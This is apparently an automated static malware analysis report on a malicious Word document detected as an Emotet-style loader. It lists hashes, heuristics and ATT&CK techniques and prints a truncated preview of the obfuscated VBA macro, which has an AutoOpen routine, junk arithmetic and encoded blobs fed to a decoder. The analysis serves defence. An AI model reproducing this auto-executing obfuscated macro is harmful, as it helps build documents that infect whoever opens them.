Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a24595725943614c…

MALICIOUS

Office (OLE)

Size: 165.5 KB
Created: 2018-04-11 08:52:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: 72c620bdf6945259a31382ef486f4a40
SHA-1: 6bec53e883dd79e05333fb7bdcd042e6b59fd1c3
SHA-256: a24595725943614cdb52f5703378d68828dd15cc42a46c70514e63ea921e669d
Risk Score: 224

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro attempts to execute a second-stage payload by calling Application.Run with a dynamically constructed string, likely downloading and running further malicious content. The ClamAV detection and heuristic firings strongly indicate malicious intent.

Heuristics (8)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project contains an AutoOpen subroutine, which runs automatically when the document is opened.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The VBA code calls CreateObject.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents where source extraction failed, so that visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 145242 bytes
SHA-256: 6a7512a99a913ea9fd734cf998ff3d168a3ae2f815226439690d8f342714fde8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 46 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "zSCwnFfK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
dmGOs = CByte(vtQhZ)
otYWT = FPLsf
oqjRU = Cos(26532 - Oct(25179 + kdUBz * Scquf - CBool(zbwPNK)))
Application.Run aXTNl + "FCsdtDpiBrtboj" + saCqd, CUDZL + tVZimvCb + XXCBd
QMpQM = CByte(REKtmw)
QjuGq = lMVcV
CnqqmS = Cos(47253 - Oct(88816 + zYRbNK * ZOJiE - CBool(vpdRL)))
End Sub

Attribute VB_Name = "rMukUXKEaNXa"
Sub EWSLc(cGMmGT)
pusBMV = CByte(mChCo)
EDFwLr = UAkcdA
iffZoR = Cos(63193 - Oct(64863 + MZBBT * CpQXja - CBool(ANbOk)))
End Sub
Function tVZimvCb()
On Error Resume Next
CwvjTJ = CByte(pfGQQ)
dnIYt = lDKOL
vzBZnb = Cos(38210 - Oct(53010 + UwprR * iUPDDY - CBool(kKiHI)))
mIzMjl = UjcSm("nQjDj1EANAA1ADYAMgBiADMAMAA5ADMAOQBlADkAZAAzADQANwBjADUAOABkzvt", 7 + YMSfR - YMSfR, 54 + YMSfR - YMSfR)
TXrikp = CByte(MEPsf)
oMJoTh = cDjuLH
tNqrf = Cos(36447 - Oct(76818 + jcQEC * adEXXG - CBool(obWPaj)))
LcEjvr = CByte(bKnkB)
EKABqO = iEkZN
tUMzj = Cos(51868 - Oct(60895 + PGXzd * XVwmn - CBool(DwTmuc)))
wsKrzOmiJ = UjcSm("da,kADMAMQBiADIAMQA0ADEAYgAzADAAZABmADkAYgAyAGQAMAA2ADAAMwBlAGMAYwA2ADMANQA0ADEAMgBlADIANgA2ADAAYwA1AGQAZQAyADIANQAwADYANwBjADMAZAAzADDo", 6 + QnzWc - QnzWc, 129 + QnzWc - QnzWc)
oQGri = CByte(ZwBOL)
JVZpD = DMtwNI
lYSwBa = Cos(8867 - Oct(8929 + rtIPs * DXWGlf - CBool(SdHPJq)))
SsNLr = CByte(hCnwiu)
nfIJt = PqKIFH
QwvHFk = Cos(73768 - Oct(30426 + ZzCht * spsnZV - CBool(fswwF)))
dCwfb = UjcSm("ohwBmADkAOQA5AGIANwAzADgAMgBhAGYAYQBmADMAZAAyAGEAZgA4AGMAOQBiAGMAMwBlADQANQA0ADgAMABiAGUAMwA2AGEAMABmADQAYwBmADYANABhADAAZQBYp%YpUb", 3 + RpCwt - RpCwt, 122 + RpCwt - RpCwt)
iHjHD = CByte(ilHfq)
HzOGIG = sjwVQ
iTGQC = Cos(22165 - Oct(18771 + NlRpsw * KukJBo - CBool(WvZkp)))
iVuJu = CByte(NiwoYn)
nDTra = RwtrO
AziOG = Cos(8258 - Oct(28194 + ljFIBI * DunKiO - CBool(VPZVCi)))
mMpjp = UjcSm("o. myAGMANwA1ADQANwAwADIAMQBhADcAZABlAGYAZAA1AGYANgAyAGIAMwBkADQAYgBlAGIANwA2ADkAYQBlADUAZABjADAANAA3AGUAOABmADMAZgAwAGIAYwA5ADkAOAA4ADgANQAxADUAYQAzADcANwBiAGEANABhADQAjJ", 5 + MpjmSp - MpjmSp, 165 + MpjmSp - MpjmSp)
Spijsu = CByte(jUsjJJ)
EwLqSJ = BFhjD
iPolB = Cos(69083 - Oct(92539 + tacJO * UavaY - CBool(NRQOi)))
JFsFF = CByte(KktzMl)
kdRCfp = bnGjHz
jzVjK = Cos(7726 - Oct(55195 + kMsPLp * RlCOIW - CBool(QzNpfm)))
jBpwM = UjcSm("3rkANQAyAGMANgA0ADYAZAA3AGUAMwBmAGQAYgAyAGMANwBkADQAMAA2ADgANQBhAGUAMABlADAANQA1ADkAMAA3ADIAMQAzADgAYgBiADgAMAAxADEAZAAzAGIANQBjAGQAMAAwAGIAYgA0ADMANAA5AGQAO2qJU8", 3 + VUQjzA - VUQjzA, 154 + VUQjzA - VUQjzA)
zLzIT = CByte(lXQChJ)
sEJPd = uVVit
DAiXVU = Cos(46770 - Oct(80597 + lAuHr * vtUAh - CBool(VqMozL)))
nJCaO = CByte(iizEn)
OwJtXN = BuIJDj
BUPvn = Cos(81167 - Oct(5082 + FUfpRF * pQQpVW - CBool(LRasE)))
CXMINBbh = UjcSm("L1ErGEAOABhADIAOAAzADgAZQA2AGYAMwBjADUAYwBkADUANgA3ADQANAAxAGQAMgA2AGQANQA4ADcAOAAxADAAOQAxADgANABhAGQANAAzAGYAZgA4AGUAZAAwADQAYwAwADgAMABjADAAMAA2ADcAZABmADMAMgA1ADQAMgA0AGQAMgA5ADQAOQA5AGYAYQA4tj", 5 + sAihET - sAihET, 191 + sAihET - sAihET)
Rizwr = CByte(JNTERz)
WtpNhv = LEssO
wbJwU = Cos(89139 - Oct(71837 + bbUhwX * cWLzru - CBool(jWDsw)))
XtjlXR = CByte(wlllz)
LhdIaU = YNYmu
vitTww = Cos(91935 - Oct(41787 + CFfCpB * zvqHw - CBool(NjCGk)))
pqRsjnhF = UjcSm("AjhADUAYgA0ADgANwAyADUAZAA4ADAAZgA3ADIAZQBjADUAZQA0AGEAZAA5AGEAZAAzADcAMwBhAGYAMQBmAGEAZQBmADkAYQAxADkAYQA0AGQAZgA5ADEAOQBjADEANQBlAGEAMAA2ADQAOAA2AGUAZQBhADkANgA4AGMAO%bSq4", 3 + NMlHjd - NMlHjd, 166 + NMlHjd - NMlHjd)
SJUuq = CByte(WuERom)
PYiXd = iBPQd
nstQKR = Cos(80272 - Oct(26807 + DdiKoT * GEfGE - CBool(hiiLY)))
OLEqf = CByte(AJdLwH)
VDRzch = ZQOZH
jzfCb = Cos(3592 - Oct(82934 + GzOpj * uzOFGF - CBool(jzmdrk)))
BsQpVXRtmbw = UjcSm("QFYwBjADQANwA2AGMANgBmAGEAYgA0ADAAYgBlADcAYQBjADIAOQBlAGQAZQBhADYAMwBkAGUAZgAyADUAN2S8j", 3 + GODtrz - GODtrz, 81 + GODtrz - GODtrz)
iwwfiF = CByte(Cdakw)
WPGDI = iTcCJT
pwztZ = Cos(70220 - Oct(34193 + aIAjG * 
... (truncated)